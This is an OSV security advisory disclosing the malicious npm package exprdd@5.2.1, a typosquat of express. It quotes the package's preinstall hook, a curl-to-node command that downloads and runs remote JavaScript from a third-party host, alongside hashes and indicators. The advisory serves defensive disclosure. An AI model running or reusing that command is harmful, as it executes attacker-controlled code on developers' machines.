MAL-2026-17241

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/exprdd/MAL-2026-17241.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17241
Published
2026-09-29T14:39:12Z
Modified
2026-09-29T15:00:05Z
Summary
Malicious code in exprdd (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (4cd27ec488e87cd2e26c940ac161033475731708a3f2ae629c4a138275b520f9)

exprdd@5.2.1 impersonates the express framework — package name, description, author, contributors, repository, homepage, and keywords are copied verbatim from express. package.json declares a preinstall lifecycle hook: "curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node". On npm install, this fetches JavaScript from a third-party host (codeberg.org/hellscripter/install-scripts, proxied through web.archive.org) and pipes it directly into node. The fetched code is attacker-controlled, unpinned (mutable main branch), and unverified, and executes with the installer's privileges before any package code is required. The typosquat name is the delivery vector for developers mistyping express.

Database specific
{
    "malicious-packages-origins":  [
        {
            "id":  "IN-MAL-2026-020625",
            "import_time":  "2026-09-29T14:44:37.00132909Z",
            "modified_time":  "2026-09-29T14:39:12Z",
            "sha256":  "4cd27ec488e87cd2e26c940ac161033475731708a3f2ae629c4a138275b520f9",
            "source":  "amazon-inspector",
            "versions":  [
                "5.2.1"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / exprdd

Package

Affected ranges

Affected versions

5.*
5.2.1

Database specific

cwes
[
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files":  [
        {
            "path":  "package.json",
            "sha256":  "218845c213eff56cf6fe35a98d5610c1455fb92adf9688c0f97614561b7199ce",
            "tlsh":  "5351da21cc0e8c6326c5a2dd3c69a542612188078e41f81cf769539c8f8e52f71b9fbf"
        }
    ],
    "package_integrity":  [
        {
            "filename":  "exprdd-5.2.1.tgz",
            "hashes":  {
                "sha1":  "979d5e66141a1e7ede45f5fdeee09b11991f588c",
                "sha512_sri":  "sha512-WvoEyw7cVWFbjaLX3VVoD5djjGWQM8Bohi0tDfXIwVxhYCJOnRAw+XOuglpg2FHqJdgdpNgJ05ZEfK4LsaqXwQ=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/exprdd/MAL-2026-17241.json"